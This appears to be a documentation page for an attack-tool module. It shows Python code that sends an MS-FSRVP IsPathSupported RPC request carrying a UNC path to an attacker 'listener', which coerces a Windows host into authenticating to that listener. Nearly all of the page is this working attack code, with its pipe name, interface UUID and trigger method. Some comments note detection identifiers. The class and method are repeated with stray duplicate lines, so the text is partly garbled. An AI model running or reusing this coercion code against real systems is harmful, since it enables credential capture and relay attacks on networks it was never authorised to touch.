coercer.methods.MS_FSRVP.IsPathSupported

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : IsPathSupported.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
10from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
11
12
class _IsPathSupported(NDRCALL):
    """
    NDR request for the IsPathSupported() call of the [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    The request marshals a single field, ShareName, as a wide string.
    """
    # Operation number of IsPathSupported on the interface.
    opnum = 8
    # Request fields in wire order; there is only one.
    structure = (('ShareName', WSTR),)  # Type: LPWSTR
21
22
class _IsPathSupportedResponse(NDRCALL):
    """
    NDR response for the IsPathSupported() call of the [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    No fields are declared, so nothing in the reply is decoded through this
    structure.
    """
    # Empty field list: the reply body is not parsed into named members.
    structure = tuple()
28
29
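class IsPathSupported(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates for the ShareName argument, tagged with the transport
    # they relate to. "{{listener}}" is presumably substituted elsewhere
    # before trigger() reads self.path - confirm against MSPROTOCOLRPCCALL.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # RPC endpoints on which the interface is reached.
    # NOTE(review): "ncan_np" looks like a misspelling of the "ncacn_np"
    # protocol sequence. It is kept as-is because code outside this file
    # presumably looks the key up by this exact spelling - confirm before
    # renaming.
    # Detection: the pipe name and interface UUID below are the identifiers
    # to match in SMB/RPC telemetry. MS-FSRVP is typically used only by
    # backup software, so binds from other hosts merit review.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\Fssagentrpc",
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ]
    }

    # Human-readable protocol identification.
    protocol = {
        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
        "shortname": "MS-FSRVP"
    }

    # Called function; "vulnerable_arguments" names the request field that
    # carries the path.
    function = {
        "name": "IsPathSupported",
        "opnum": 8,
        "vulnerable_arguments": ["ShareName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one IsPathSupported request with ShareName set to ``self.path``.

        ``self.path`` is not assigned in this class; presumably the base
        class or the caller sets it - confirm.

        Args:
            dcerpc_session: Object exposing ``request()``; ``None`` is
                reported as "not connected".
            target: Not used by this method.

        Returns:
            ``""`` when the request completes without raising, the caught
            exception object when it raises, or ``None`` when
            ``dcerpc_session`` is ``None``.
        """
        # Guard: without a session there is nothing to send.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            request = _IsPathSupported()
            request['ShareName'] = self.path
            # The reply is discarded; only completion or the raised error
            # is reported back.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Returned rather than raised; presumably the caller classifies
            # the RPC fault from this value - confirm.
            return err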
class IsPathSupported(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
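class IsPathSupported(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates for the ShareName argument, tagged with the transport
    # they relate to. "{{listener}}" is presumably substituted elsewhere
    # before trigger() reads self.path - confirm against MSPROTOCOLRPCCALL.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # RPC endpoints on which the interface is reached.
    # NOTE(review): "ncan_np" looks like a misspelling of the "ncacn_np"
    # protocol sequence. It is kept as-is because code outside this file
    # presumably looks the key up by this exact spelling - confirm before
    # renaming.
    # Detection: the pipe name and interface UUID below are the identifiers
    # to match in SMB/RPC telemetry. MS-FSRVP is typically used only by
    # backup software, so binds from other hosts merit review.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\Fssagentrpc",
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ]
    }

    # Human-readable protocol identification.
    protocol = {
        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
        "shortname": "MS-FSRVP"
    }

    # Called function; "vulnerable_arguments" names the request field that
    # carries the path.
    function = {
        "name": "IsPathSupported",
        "opnum": 8,
        "vulnerable_arguments": ["ShareName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one IsPathSupported request with ShareName set to ``self.path``.

        ``self.path`` is not assigned in this class; presumably the base
        class or the caller sets it - confirm.

        Args:
            dcerpc_session: Object exposing ``request()``; ``None`` is
                reported as "not connected".
            target: Not used by this method.

        Returns:
            ``""`` when the request completes without raising, the caught
            exception object when it raises, or ``None`` when
            ``dcerpc_session`` is ``None``.
        """
        # Guard: without a session there is nothing to send.
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            request = _IsPathSupported()
            request['ShareName'] = self.path
            # The reply is discarded; only completion or the raised error
            # is reported back.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Returned rather than raised; presumably the caller classifies
            # the RPC fault from this value - confirm.
            return err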

Coercing a machine to authenticate using function IsPathSupported (opnum 8) of MS-FSRVP Protocol

Method found by: @topotam77 (https://twitter.com/topotam77)

# Path templates for the ShareName argument, tagged with the transport they
# relate to. "{{listener}}" is presumably substituted elsewhere - confirm.
exploit_paths = [
    ('smb', '\\\\{{listener}}\x00'),
]
# RPC endpoints on which the interface is reached. The pipe name and the
# interface UUID are the identifiers to match in SMB/RPC telemetry.
# NOTE(review): 'ncan_np' looks like a misspelling of 'ncacn_np'; it is kept
# because consumers presumably look the key up by this spelling - confirm.
access = {
    'ncan_np': [
        {
            'namedpipe': '\\PIPE\\Fssagentrpc',
            'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292',
            'version': '1.0',
        },
    ],
    'ncacn_ip_tcp': [
        {
            'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292',
            'version': '1.0',
        },
    ],
}
# Human-readable protocol identification.
protocol = {
    'longname': '[MS-FSRVP]: File Server Remote VSS Protocol',
    'shortname': 'MS-FSRVP',
}
# Called function; 'vulnerable_arguments' names the request field that
# carries the path.
function = {
    'name': 'IsPathSupported',
    'opnum': 8,
    'vulnerable_arguments': ['ShareName'],
}
def trigger(self, dcerpc_session, target):
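def trigger(self, dcerpc_session, target):
    """
    Send one IsPathSupported request with ShareName set to ``self.path``.

    ``self.path`` is not assigned in the visible code; presumably the base
    class or the caller sets it - confirm.

    Args:
        dcerpc_session: Object exposing ``request()``; ``None`` is reported
            as "not connected".
        target: Not used by this method.

    Returns:
        ``""`` when the request completes without raising, the caught
        exception object when it raises, or ``None`` when
        ``dcerpc_session`` is ``None``.
    """
    # Guard: without a session there is nothing to send.
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None

    try:
        request = _IsPathSupported()
        request['ShareName'] = self.path
        # The reply is discarded; only completion or the raised error is
        # reported back.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Returned rather than raised; presumably the caller classifies the
        # RPC fault from this value - confirm.
        return err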